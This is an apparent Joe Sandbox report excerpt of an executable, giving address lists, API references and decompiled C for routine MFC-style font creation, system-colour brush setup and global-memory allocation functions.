0x00d33637
0x00d33640
0x00d33649
0x00d33652
0x00d33655
0x00d3365a
0x00d33661
0x00d33664
0x00d33666
0x00d33666
0x00d33666
0x00d3365c
0x00d3365e
0x00d3365e
0x00d3366e
0x00d33670
0x00d33670
0x00d33678
0x00d33686
0x00d3368b
0x00d336ad
0x00d336b1
0x00d336d6
0x00d336d8
0x00d336da
0x00d336dd
0x00d336e6
0x00d336df
0x00d336df
0x00d336df
0x00d336ec
0x00d336b3
0x00d336bc
0x00d336be
0x00d336be
0x00d336b1
0x00d336ee
0x00d33701
0x00d33706
0x00d3370a
0x00d33710
0x00d33715
0x00d3371b
0x00d33722
0x00d3372e
0x00d33730
0x00d3373a
0x00d33746
0x00d33749
0x00d3374d
0x00d3374d
0x00d3375d
0x00d3376a
0x00d33774
0x00d3377e
0x00d33789
0x00d33792
0x00d337a2
0x00d337ad
0x00d337b6
0x00d337bd
0x00d337ca
0x00d337d2
0x00d337d7
0x00d337e7
0x00d337ec
0x00d337ef
0x00d337f5
0x00d33800
0x00d3380c
0x00d33812
0x00d33819
0x00d3381f
0x00d33824
0x00d3382b
0x00d3382e
0x00d3383a
0x00d3383e
0x00d33844
0x00d3384a
0x00d33852
0x00d33854
0x00d3385f
0x00d33867
0x00d33870
0x00d33879
0x00d33885
0x00d3388c
0x00d33893
0x00d338a6
0x00d338ae
0x00d338b6
0x00d338bd
0x00d338c3
0x00d338c3
0x00d3385f
0x00d338df
0x00d338e4
0x00d338f6
0x00d338fe
0x00d33903
0x00d33917
0x00d3391c
0x00d3391e
0x00d33923
0x00d33957
0x00d3392b
0x00d3392d
0x00d3392f
0x00d33989
0x00d33989
0x00d3398e
0x00d33996
0x00d3399b
0x00d3399d
0x00d339a8
0x00d339af
0x00d339b1
0x00d339be
0x00d339be
0x00d339be
0x00d339b3
0x00d339b5
0x00d339b7
0x00d339b9
0x00000000
0x00d339bb
0x00d339bb
0x00d339bb
0x00d339b9
0x00d339c2
0x00d339c8
0x00d339ca
0x00d339cc
0x00d339db
0x00d339db
0x00d339db
0x00d339ce
0x00d339d0
0x00d339d2
0x00d339d4
0x00000000
0x00d339d6
0x00d339d8
0x00d339d8
0x00d339d4
0x00d339e2
0x00d339e8
0x00d339ed
0x00d339fe
0x00d33a04
0x00d33a08
0x00d33a0b
0x00d33a0e
0x00d33a12
0x00d33a15
0x00d33a18
0x00d33a1c
0x00d33a1f
0x00d33a22
0x00d33a26
0x00d33a29
0x00d33a2c
0x00d33a30
0x00d33a33
0x00d33a36
0x00d33a3a
0x00d33a3d
0x00d33a44
0x00d33a4b
0x00d33a52
0x00d33a59
0x00d33a5c
0x00d33a60
0x00d33a63
0x00d33a6a
0x00d33a71
0x00d33a78
0x00d33a7f
0x00d33a86
0x00d33a90
0x00d33a9a
0x00d33aa4
0x00d33aae
0x00d33ab4
0x00d33ab6
0x00d33abd
0x00d33ac3
0x00d33ad2
0x00d33ad4
0x00d33adb
0x00d33ac5
0x00d33ac5
0x00d33ac8
0x00d33acb
0x00d33acb
0x00d33aea
0x00d33aed
0x00d33af1
0x00d33af4
0x00d33af6
0x00d33afb
0x00d33afd
0x00d33afd
0x00d33afd
0x00d33b04
0x00d33b08
0x00d33b0b
0x00d33b0d
0x00d33b12
0x00000000
0x00000000
0x00d33b16
0x00d33b1a
0x00d33b1d
0x00d33b1f
0x00d33b24
0x00000000
0x00000000
0x00d33b2e
0x00d33b3c
0x00d33b41
0x00d33b4e
0x00d33b5b
0x00d33b68
0x00d33b75
0x00d33b82
0x00d33b92
0x00d33b9f
0x00d33bac
0x00d33bb9
0x00d33bc6
0x00d33bd3
0x00d33be0
0x00d33bed
0x00d33c02
0x00d33c07
0x00d33c14
0x00d33c28
0x00d33c35
0x00d33c49
0x00d33c4e
0x00d33c54
0x00d33c56
0x00d33c58
0x00d33c5c
0x00d33c60
0x00d33c60
0x00d33c5c
0x00d33c65
0x00d33c6c
0x00d33cec
0x00d33cee
0x00d33cf3
0x00000000
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33d02
0x00d33d09
0x00d33d0d
0x00d33d1e
0x00d33d26
0x00d33d2a
0x00d33d2d
0x00d33d2d
0x00d33c6e
0x00d33c72
0x00d33c75
0x00d33c78
0x00d33c82
0x00d33c8b
0x00d33c92
0x00d33ca9
0x00d33cbe
0x00d33cd9
0x00d33cd9
0x00d33d32
0x00d33d37
0x00d33d37
0x00d33d37
0x00d33d3e
0x00d33d48
0x00d33d4d
0x00d33d52
0x00d33931
0x00d33931
0x00d33936
0x00d3393d
0x00d3393f
0x00000000
0x00d33941
0x00d33944
0x00d33949
0x00d3394b
0x00d3394f
0x00d33951
0x00d33951
0x00000000
0x00d3394b
0x00d3393f
0x00000000
0x00d3392f
0x00d33961
0x00d33965
0x00d3396f
0x00d33974
0x00d3397e
0x00d33983
0x00d33988
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00D33486

Part of subcall function 00D19FA4: __EH_prolog3.LIBCMT ref: 00D19FAB

DeleteObject.GDI32(00000000), ref: 00D33516
DeleteObject.GDI32(00000000), ref: 00D33530
DeleteObject.GDI32(00000000), ref: 00D3354A
DeleteObject.GDI32(00000000), ref: 00D33564
DeleteObject.GDI32(00000000), ref: 00D3357E
DeleteObject.GDI32(00000000), ref: 00D33598
DeleteObject.GDI32(00000000), ref: 00D335B2
DeleteObject.GDI32(00000000), ref: 00D335CC
DeleteObject.GDI32(00000000), ref: 00D335E6
DeleteObject.GDI32(00000000), ref: 00D33600
_memset.LIBCMT ref: 00D33621
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00D33631
lstrcpyW.KERNEL32(?,?), ref: 00D33686
EnumFontFamiliesW.GDI32(?,00000000,00D32E22,Segoe UI), ref: 00D336AD
lstrcpyW.KERNEL32(?,Segoe UI), ref: 00D336BC
EnumFontFamiliesW.GDI32(?,00000000,00D32E22,Tahoma), ref: 00D336D6
lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 00D336EC
CreateFontIndirectW.GDI32(?), ref: 00D336F8
CreateFontIndirectW.GDI32(?), ref: 00D33754
CreateFontIndirectW.GDI32(?), ref: 00D33799
CreateFontIndirectW.GDI32(?), ref: 00D337C1
CreateFontIndirectW.GDI32(?), ref: 00D337DE
GetSystemMetrics.USER32(00000048), ref: 00D337F9
lstrcpyW.KERNEL32(?,Marlett), ref: 00D3380C
CreateFontIndirectW.GDI32(?), ref: 00D33812
GetStockObject.GDI32(00000011), ref: 00D3383E
GetObjectW.GDI32(00000000,0000005C,?), ref: 00D3385B
lstrcpyW.KERNEL32(?,Arial), ref: 00D33893
CreateFontIndirectW.GDI32(?), ref: 00D33899
CreateFontIndirectW.GDI32(?), ref: 00D338B6
GetStockObject.GDI32(00000011), ref: 00D338CA
GetObjectW.GDI32(?,0000005C,?,00000000), ref: 00D338DF
CreateFontIndirectW.GDI32(?), ref: 00D338E9
CreateFontIndirectW.GDI32(?), ref: 00D3390A

Part of subcall function 00D33D53: __EH_prolog3_GS.LIBCMT ref: 00D33D5A
Part of subcall function 00D33D53: GetTextMetricsW.GDI32(?,?,00000006,00000000,00000054,00D33923,00000000), ref: 00D33D97
Part of subcall function 00D33D53: GetTextMetricsW.GDI32(?,?,?), ref: 00D33DD8

Part of subcall function 00D0BD09: __CxxThrowException@8.LIBCMT ref: 00D0BD1D

Strings

Marlett, xrefs: 00D33806
Tahoma, xrefs: 00D336C4, 00D336DF
Arial, xrefs: 00D3387F
Segoe UI, xrefs: 00D33696, 00D336B3
MS Sans Serif, xrefs: 00D336E6

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CharsetException@8H_prolog3InfoSystemThrow_memset
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 967143792-1395034203
Opcode ID: cb20bf282a17645095ed93a3ac4328f8093a99fef8f91f4db85093fbf40af8d2
Instruction ID: 8d86bd877ef8ff724f255cbc512de54f0c39a8f5a17420dc1b46865d1f1f8301
Opcode Fuzzy Hash: cb20bf282a17645095ed93a3ac4328f8093a99fef8f91f4db85093fbf40af8d2
Instruction Fuzzy Hash: D5E15FB1900308AFDF21EBB4DD49BDEB7B8AF05300F044599E54AA7291DB749A88CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D3398F Relevance: 63.3, APIs: 42, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00D3398F(signed int __ecx, void* __edx) {
				signed int _t103;
				signed int _t105;
				long _t108;
				long _t109;
				long _t110;
				long _t111;
				long _t112;
				long _t113;
				long _t118;
				long _t129;
				struct HBRUSH__* _t130;
				struct HBRUSH__* _t131;
				struct HBRUSH__* _t133;
				struct HBRUSH__* _t135;
				struct HPEN__* _t156;
				void* _t170;
				long _t195;
				signed char _t197;
				void* _t235;
				intOrPtr _t240;
				void* _t253;
				void* _t259;
				struct HBRUSH__* _t265;
				struct HBRUSH__* _t267;
				struct HBRUSH__* _t269;

				_t235 = __edx;
				0xe214d0(0x24);
				_t196 = __ecx;
				 *((intOrPtr*)(_t259 - 0x14)) = __ecx;
				if(GetSysColor(0x16) != 0xffffff) {
					L3:
					_t103 = 0;
					__eflags = 0;
				} else {
					_t195 = GetSysColor(0xf);
					if(_t195 != 0) {
						goto L3;
					} else {
						_t103 = _t195 + 1;
					}
				}
				 *((intOrPtr*)(_t196 + 0x184)) = _t103;
				if(GetSysColor(0x15) != 0 || GetSysColor(0xf) != 0xffffff) {
					_t105 = 0;
					__eflags = 0;
				} else {
					_t105 = 1;
				}
				 *((intOrPtr*)(_t196 + 0x188)) = _t105;
				E00D19FA4(_t259 - 0x30);
				 *(_t259 - 4) =  *(_t259 - 4) & 0x00000000;
				 *((intOrPtr*)(_t196 + 0x1ac)) =  *0xe8e184( *((intOrPtr*)(_t259 - 0x28)), 0xc, 0);
				_t108 = GetSysColor(0xf);
				 *(_t196 + 0x1c) = _t108;
				 *(_t196 + 0x54) = _t108;
				_t109 = GetSysColor(0x10);
				 *(_t196 + 0x20) = _t109;
				 *(_t196 + 0x58) = _t109;
				_t110 = GetSysColor(0x15);
				 *(_t196 + 0x30) = _t110;
				 *(_t196 + 0x60) = _t110;
				_t111 = GetSysColor(0x16);
				 *(_t196 + 0x34) = _t111;
				 *(_t196 + 0x64) = _t111;
				_t112 = GetSysColor(0x14);
				 *(_t196 + 0x24) = _t112;
				 *(_t196 + 0x5c) = _t112;
				_t113 = GetSysColor(0x12);
				 *(_t196 + 0x28) = _t113;
				 *(_t196 + 0x68) = _t113;
				 *((intOrPtr*)(_t196 + 0x38)) = GetSysColor(0x11);
				 *((intOrPtr*)(_t196 + 0x2c)) = GetSysColor(6);
				 *(_t196 + 0x3c) = GetSysColor(0xd);
				 *((intOrPtr*)(_t196 + 0x40)) = GetSysColor(0xe);
				_t118 = GetSysColor(5);
				 *(_t196 + 0x6c) = _t118;
				 *(_t196 + 0x50) = _t118;
				 *(_t196 + 0x70) = GetSysColor(8);
				 *((intOrPtr*)(_t196 + 0x74)) = GetSysColor(9);
				 *((intOrPtr*)(_t196 + 0x78)) = GetSysColor(7);
				 *(_t196 + 0x7c) = GetSysColor(2);
				 *(_t196 + 0x80) = GetSysColor(3);
				 *((intOrPtr*)(_t196 + 0x88)) = GetSysColor(0x1b);
				 *((intOrPtr*)(_t196 + 0x8c)) = GetSysColor(0x1c);
				 *((intOrPtr*)(_t196 + 0x90)) = GetSysColor(0xa);
				 *((intOrPtr*)(_t196 + 0x94)) = GetSysColor(0xb);
				 *((intOrPtr*)(_t196 + 0x84)) = GetSysColor(0x13);
				if( *((intOrPtr*)(_t196 + 0x184)) == 0) {
					_t129 = GetSysColor(0x1a);
					 *(_t196 + 0x48) = 0xff0000;
					 *(_t196 + 0x4c) = 0x800080;
				} else {
					_t129 =  *(_t196 + 0x70);
					 *(_t196 + 0x48) = _t129;
					 *(_t196 + 0x4c) = _t129;
				}
				 *(_t196 + 0x44) = _t129;
				_t130 = GetSysColorBrush(0x10);
				 *(_t196 + 0x14) = _t130;
				_t265 = _t130;
				_t201 = 0 | _t265 == 0x00000000;
				if(_t265 == 0) {
					L12:
					E00D0BD09(_t201);
				}
				_t131 = GetSysColorBrush(0x14);
				 *(_t196 + 0x10) = _t131;
				_t267 = _t131;
				_t201 = 0 | _t267 != 0x00000000;
				if(_t267 != 0) {
					goto L12;
				}
				_t133 = GetSysColorBrush(5);
				 *(_t196 + 0x18) = _t133;
				_t269 = _t133;
				_t201 = 0 | _t269 != 0x00000000;
				if(_t269 != 0) {
					goto L12;
				}
				_t243 = _t196 + 0x98;
				E00D1A9E6(_t196 + 0x98);
				_t135 = CreateSolidBrush( *(_t196 + 0x1c)); // executed
				E00D1A8DA(_t196, _t243, _t235, _t135);
				_t244 = _t196 + 0xd0;
				E00D1A9E6(_t196 + 0xd0);
				E00D1A8DA(_t196, _t244, _t235, CreateSolidBrush( *(_t196 + 0x54)));
				_t245 = _t196 + 0xb8;
				E00D1A9E6(_t196 + 0xb8);
				E00D1A8DA(_t196, _t245, _t235, CreateSolidBrush( *(_t196 + 0x7c)));
				_t246 = _t196 + 0xc0;
				E00D1A9E6(_t196 + 0xc0);
				E00D1A8DA(_t196, _t246, _t235, CreateSolidBrush( *(_t196 + 0x80)));
				_t247 = _t196 + 0xa0;
				E00D1A9E6(_t196 + 0xa0);
				E00D1A8DA(_t196, _t247, _t235, CreateSolidBrush( *(_t196 + 0x3c)));
				_t248 = _t196 + 0xb0;
				E00D1A9E6(_t196 + 0xb0);
				E00D1A8DA(_t196, _t248, _t235, CreateSolidBrush( *(_t196 + 0x30)));
				_t249 = _t196 + 0xc8;
				E00D1A9E6(_t196 + 0xc8);
				E00D1A8DA(_t196, _t249, _t235, CreateSolidBrush( *(_t196 + 0x6c)));
				_t250 = _t196 + 0xd8;
				E00D1A9E6(_t196 + 0xd8);
				_t156 = CreatePen(0, 1,  *0xf0d5b4); // executed
				E00D1A8DA(_t196, _t250, _t235, _t156);
				_t251 = _t196 + 0xe0;
				E00D1A9E6(_t196 + 0xe0);
				E00D1A8DA(_t196, _t251, _t235, CreatePen(0, 1,  *0xf0d5cc));
				_t252 = _t196 + 0xe8;
				E00D1A9E6(_t196 + 0xe8);
				E00D1A8DA(_t196, _t252, _t235, CreatePen(0, 1,  *0xf0d5d0));
				_t253 = _t196 + 0xa8;
				if(_t253 != 0 &&  *((intOrPtr*)(_t253 + 4)) != 0) {
					E00D1A9E6(_t253);
				}
				if( *((intOrPtr*)(_t196 + 0x1ac)) <= 8) {
					__eflags = E00D32A91( *((intOrPtr*)(_t259 - 0x2c)));
					_t201 = 0 | __eflags != 0x00000000;
					if(__eflags == 0) {
						goto L12;
					} else {
						_t89 = _t259 - 0x18;
						 *_t89 =  *(_t259 - 0x18) & 0x00000000;
						__eflags =  *_t89;
						 *((intOrPtr*)(_t259 - 0x1c)) = 0xea00f4;
						 *(_t259 - 4) = 1;
						E00D1A8DA(_t196, _t259 - 0x1c, _t235, _t164);
						E00D1A8DA(_t196, _t253, _t235, CreatePatternBrush( *(_t259 - 0x18)));
						 *(_t259 - 4) = 0;
						 *((intOrPtr*)(_t259 - 0x1c)) = 0xea00f4;
						E00D1A062(_t259 - 0x1c);
					}
				} else {
					_t240 =  *((intOrPtr*)(_t259 - 0x14));
					_t197 =  *((intOrPtr*)(_t196 + 0x1e));
					 *(_t259 - 0x10) =  *(_t196 + 0x1d) & 0x000000ff;
					 *(_t259 - 0xd) =  *((intOrPtr*)(_t240 + 0x1c));
					asm("cdq");
					_t196 =  *(_t259 - 0x10);
					asm("cdq");
					asm("cdq");
					E00D1A8DA(_t196, _t240 + 0xa8, _t235, CreateSolidBrush((((( *(_t240 + 0x26) & 0x000000ff) - (_t197 & 0x000000ff) - _t235 >> 0x00000001) + _t197 & 0x000000ff) << 0x00000008 | (( *(_t240 + 0x25) & 0x000000ff) - ( *(_t259 - 0x10) & 0x000000ff) - _t235 >> 0x00000001) + _t196 & 0x000000ff) << 0x00000008 | (( *(_t240 + 0x24) & 0x000000ff) - ( *(_t259 - 0xd) & 0x000000ff) - _t235 >> 0x00000001) +  *(_t259 - 0xd) & 0x000000ff));
				}
				E00D39F05();
				_t98 = _t259 - 4;
				 *(_t259 - 4) =  *(_t259 - 4) | 0xffffffff;
				 *0xf0ed90 = 1;
				_t170 = E00D1A178(_t196, _t259 - 0x30, _t235,  *_t98);
				0xe2149e();
				return _t170;
			}

0x00d3398f
0x00d33996
0x00d3399b
0x00d3399d
0x00d339b1
0x00d339be
0x00d339be
0x00d339be
0x00d339b3
0x00d339b5
0x00d339b9
0x00000000
0x00d339bb
0x00d339bb
0x00d339bb
0x00d339b9
0x00d339c2
0x00d339cc
0x00d339db
0x00d339db
0x00d339d6
0x00d339d8
0x00d339d8
0x00d339e2
0x00d339e8
0x00d339ed
0x00d339fe
0x00d33a04
0x00d33a08
0x00d33a0b
0x00d33a0e
0x00d33a12
0x00d33a15
0x00d33a18
0x00d33a1c
0x00d33a1f
0x00d33a22
0x00d33a26
0x00d33a29
0x00d33a2c
0x00d33a30
0x00d33a33
0x00d33a36
0x00d33a3a
0x00d33a3d
0x00d33a44
0x00d33a4b
0x00d33a52
0x00d33a59
0x00d33a5c
0x00d33a60
0x00d33a63
0x00d33a6a
0x00d33a71
0x00d33a78
0x00d33a7f
0x00d33a86
0x00d33a90
0x00d33a9a
0x00d33aa4
0x00d33aae
0x00d33abd
0x00d33ac3
0x00d33ad2
0x00d33ad4
0x00d33adb
0x00d33ac5
0x00d33ac5
0x00d33ac8
0x00d33acb
0x00d33acb
0x00d33aea
0x00d33aed
0x00d33af1
0x00d33af4
0x00d33af6
0x00d33afb
0x00d33afd
0x00d33afd
0x00d33afd
0x00d33b04
0x00d33b08
0x00d33b0b
0x00d33b0d
0x00d33b12
0x00000000
0x00000000
0x00d33b16
0x00d33b1a
0x00d33b1d
0x00d33b1f
0x00d33b24
0x00000000
0x00000000
0x00d33b26
0x00d33b2e
0x00d33b3c
0x00d33b41
0x00d33b46
0x00d33b4e
0x00d33b5b
0x00d33b60
0x00d33b68
0x00d33b75
0x00d33b7a
0x00d33b82
0x00d33b92
0x00d33b97
0x00d33b9f
0x00d33bac
0x00d33bb1
0x00d33bb9
0x00d33bc6
0x00d33bcb
0x00d33bd3
0x00d33be0
0x00d33be5
0x00d33bed
0x00d33c02
0x00d33c07
0x00d33c0c
0x00d33c14
0x00d33c28
0x00d33c2d
0x00d33c35
0x00d33c49
0x00d33c4e
0x00d33c56
0x00d33c60
0x00d33c60
0x00d33c6c
0x00d33cec
0x00d33cee
0x00d33cf3
0x00000000
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33d02
0x00d33d09
0x00d33d0d
0x00d33d1e
0x00d33d26
0x00d33d2a
0x00d33d2d
0x00d33d2d
0x00d33c6e
0x00d33c72
0x00d33c75
0x00d33c78
0x00d33c82
0x00d33c8b
0x00d33c92
0x00d33ca9
0x00d33cbe
0x00d33cd9
0x00d33cd9
0x00d33d32
0x00d33d37
0x00d33d37
0x00d33d3e
0x00d33d48
0x00d33d4d
0x00d33d52

APIs

__EH_prolog3.LIBCMT ref: 00D33996
GetSysColor.USER32(00000016), ref: 00D339A8
GetSysColor.USER32(0000000F), ref: 00D339B5
GetSysColor.USER32(00000015), ref: 00D339C8
GetSysColor.USER32(0000000F), ref: 00D339D0
GetSysColor.USER32(0000000F), ref: 00D33A04
GetSysColor.USER32(00000010), ref: 00D33A0E
GetSysColor.USER32(00000015), ref: 00D33A18
GetSysColor.USER32(00000016), ref: 00D33A22
GetSysColor.USER32(00000014), ref: 00D33A2C
GetSysColor.USER32(00000012), ref: 00D33A36
GetSysColor.USER32(00000011), ref: 00D33A40
GetSysColor.USER32(00000006), ref: 00D33A47
GetSysColor.USER32(0000000D), ref: 00D33A4E
GetSysColor.USER32(0000000E), ref: 00D33A55
GetSysColor.USER32(00000005), ref: 00D33A5C
GetSysColor.USER32(00000008), ref: 00D33A66
GetSysColor.USER32(00000009), ref: 00D33A6D
GetSysColor.USER32(00000007), ref: 00D33A74
GetSysColor.USER32(00000002), ref: 00D33A7B
GetSysColor.USER32(00000003), ref: 00D33A82
GetSysColor.USER32(0000001B), ref: 00D33A8C
GetSysColor.USER32(0000001C), ref: 00D33A96
GetSysColor.USER32(0000000A), ref: 00D33AA0
GetSysColor.USER32(0000000B), ref: 00D33AAA
GetSysColor.USER32(00000013), ref: 00D33AB4
GetSysColor.USER32(0000001A), ref: 00D33AD2
GetSysColorBrush.USER32(00000010), ref: 00D33AED
GetSysColorBrush.USER32(00000014), ref: 00D33B04
GetSysColorBrush.USER32(00000005), ref: 00D33B16
CreateSolidBrush.GDI32(?), ref: 00D33B3C
CreateSolidBrush.GDI32(?), ref: 00D33B56
CreateSolidBrush.GDI32(?), ref: 00D33B70
CreateSolidBrush.GDI32(?), ref: 00D33B8D
CreateSolidBrush.GDI32(?), ref: 00D33BA7
CreateSolidBrush.GDI32(?), ref: 00D33BC1
CreateSolidBrush.GDI32(?), ref: 00D33BDB
CreatePen.GDI32(00000000,00000001,00000000), ref: 00D33C02
CreatePen.GDI32(00000000,00000001,00000000), ref: 00D33C23

Part of subcall function 00D1A9E6: DeleteObject.GDI32(00000000), ref: 00D1A9F5

CreatePen.GDI32(00000000,00000001,00000000), ref: 00D33C44
CreateSolidBrush.GDI32(?), ref: 00D33CCC
CreatePatternBrush.GDI32(00000000), ref: 00D33D15

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color$BrushCreate$Solid$DeleteH_prolog3ObjectPattern
String ID:
API String ID: 2726386640-0
Opcode ID: eff4cc4c02553364b4297bc755ce487be9aa888d747edd64515b39176c68fe1f
Instruction ID: 703e786cbf9942b99339d69b85ae95a23a2c626254cdf3db4f6e17de33ec0051
Opcode Fuzzy Hash: eff4cc4c02553364b4297bc755ce487be9aa888d747edd64515b39176c68fe1f
Instruction Fuzzy Hash: C3B19D70E01214ABDF15AF758C967AE7EA0EF04700F04406AED49AF286DF748A41DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D10E Relevance: 19.6, APIs: 13, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00D0D10E(void* __ecx) {
				signed int _v8;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t62;
				void* _t63;
				long _t83;
				signed char* _t85;
				void* _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t94;
				void* _t96;
				signed int _t97;
				signed int _t100;
				void* _t102;
				void* _t103;
				signed int _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_t103 = __ecx;
				_t1 = _t103 + 0x1c; // 0xf0b384
				_t108 = _t1;
				 *0xe8e4d8(_t108, _t102, _t107, _t87, __ecx);
				_t2 = _t103 + 4; // 0x20
				_t94 =  *_t2;
				_t3 = _t103 + 8; // 0x3
				_t88 =  *_t3;
				if(_t88 >= _t94) {
					L2:
					_t88 = 1;
					if(_t94 <= 1) {
						L7:
						_t13 = _t94 + 0x20; // 0x40
						_t59 = _t13;
						_v8 = _t13;
						if( *(_t103 + 0x10) != 0) {
							_t15 = _t103 + 0x10; // 0x9cfd30
							_t109 = GlobalHandle( *_t15);
							GlobalUnWire(_t109);
							_t62 = E00D0C969(_t88, _t94, _t103, _t109, _v8, 8);
							_t96 = 0x2002;
							_t63 = GlobalReAlloc(_t109, _t62, ??);
							_t17 = _t103 + 0x1c; // 0xf0b384
							_t108 = _t17;
						} else {
							_t83 = E00D0C969(_t88, _t94, _t103, _t108, _t59, 8);
							_pop(_t96);
							_t63 = GlobalAlloc(2, _t83); // executed
						}
						if(_t63 != 0) {
							GlobalFix(_t63);
							_t19 = _t103 + 4; // 0x20
							_t97 =  *_t19;
							_t110 = _t63;
							0xe23f30(_t110 + _t97 * 8, 0, _v8 - _t97 << 3);
							 *(_t103 + 0x10) = _t110;
							_t25 = _t103 + 0x1c; // 0xf0b384
							_t108 = _t25;
							 *(_t103 + 4) = _v8;
							goto L14;
						} else {
							if( *(_t103 + 0x10) != _t63) {
								_t37 = _t103 + 0x10; // 0x9cfd30
								GlobalFix(GlobalHandle( *_t37));
							}
							 *0xe8e4d4(_t108);
							E00D0BD23(_t96);
							asm("int3");
							_t91 = _t96;
							_t112 = _t91 + 0x1c;
							 *0xe8e4d8(_t112, _t103, _t108, _t88, _t115);
							_t105 = _v16;
							if(_t105 <= 0 || _t105 >=  *((intOrPtr*)(_t91 + 0xc))) {
								_push(_t112);
							} else {
								_t114 =  *((intOrPtr*)(_t91 + 0x14));
								while(_t114 != 0) {
									if(_t105 <  *((intOrPtr*)(_t114 + 8))) {
										_t100 =  *( *((intOrPtr*)(_t114 + 0xc)) + _t105 * 4);
										if(_t100 != 0) {
											 *((intOrPtr*)( *_t100))(1);
										}
										 *( *((intOrPtr*)(_t114 + 0xc)) + _t105 * 4) =  *( *((intOrPtr*)(_t114 + 0xc)) + _t105 * 4) & 0x00000000;
									}
									_t114 =  *((intOrPtr*)(_t114 + 4));
								}
								 *( *((intOrPtr*)(_t91 + 0x10)) + _t105 * 8) =  *( *((intOrPtr*)(_t91 + 0x10)) + _t105 * 8) & 0xfffffffe;
								_push(_t91 + 0x1c);
							}
							return  *0xe8e4d4();
						}
					} else {
						_t9 = _t103 + 0x10; // 0x9cfd30
						_t85 =  *_t9 + 8;
						while(( *_t85 & 0x00000001) != 0) {
							_t88 = _t88 + 1;
							_t85 =  &(_t85[8]);
							if(_t88 < _t94) {
								continue;
							}
							break;
						}
						if(_t88 < _t94) {
							goto L14;
						} else {
							goto L7;
						}
					}
				} else {
					_t4 = _t103 + 0x10; // 0x9cfd30
					if(( *( *_t4 + _t88 * 8) & 0x00000001) == 0) {
						L14:
						_t27 = _t103 + 0xc; // 0x3
						if(_t88 >=  *_t27) {
							_t28 = _t88 + 1; // 0x4
							 *((intOrPtr*)(_t103 + 0xc)) = _t28;
						}
						_t30 = _t103 + 0x10; // 0x9cfd30
						 *( *_t30 + _t88 * 8) =  *( *_t30 + _t88 * 8) | 0x00000001;
						_t35 = _t88 + 1; // 0x4
						 *(_t103 + 8) = _t35;
						 *0xe8e4d4(_t108);
						return _t88;
					} else {
						goto L2;
					}
				}
			}

0x00d0d115
0x00d0d117
0x00d0d117
0x00d0d11b
0x00d0d121
0x00d0d121
0x00d0d124
0x00d0d124
0x00d0d129
0x00d0d138
0x00d0d13a
0x00d0d13d
0x00d0d15a
0x00d0d15e
0x00d0d15e
0x00d0d161
0x00d0d164
0x00d0d17b
0x00d0d184
0x00d0d187
0x00d0d197
0x00d0d19d
0x00d0d1a0
0x00d0d1a6
0x00d0d1a6
0x00d0d166
0x00d0d169
0x00d0d16f
0x00d0d173
0x00d0d173
0x00d0d1ab
0x00d0d1b5
0x00d0d1bb
0x00d0d1bb
0x00d0d1be
0x00d0d1cf
0x00d0d1da
0x00d0d1dd
0x00d0d1dd
0x00d0d1e0
0x00000000
0x00d0d1ad
0x00d0d1b0
0x00d0d20b
0x00d0d215
0x00d0d215
0x00d0d21c
0x00d0d222
0x00d0d227
0x00d0d22c
0x00d0d230
0x00d0d234
0x00d0d23a
0x00d0d23f
0x00d0d27b
0x00d0d246
0x00d0d246
0x00d0d26a
0x00d0d24e
0x00d0d253
0x00d0d258
0x00d0d25e
0x00d0d25e
0x00d0d263
0x00d0d263
0x00d0d267
0x00d0d267
0x00d0d271
0x00d0d278
0x00d0d278
0x00d0d286
0x00d0d286
0x00d0d13f
0x00d0d13f
0x00d0d142
0x00d0d145
0x00d0d14a
0x00d0d14b
0x00d0d150
0x00000000
0x00000000
0x00000000
0x00d0d150
0x00d0d154
0x00000000
0x00000000
0x00000000
0x00000000
0x00d0d154
0x00d0d12b
0x00d0d12b
0x00d0d132
0x00d0d1e3
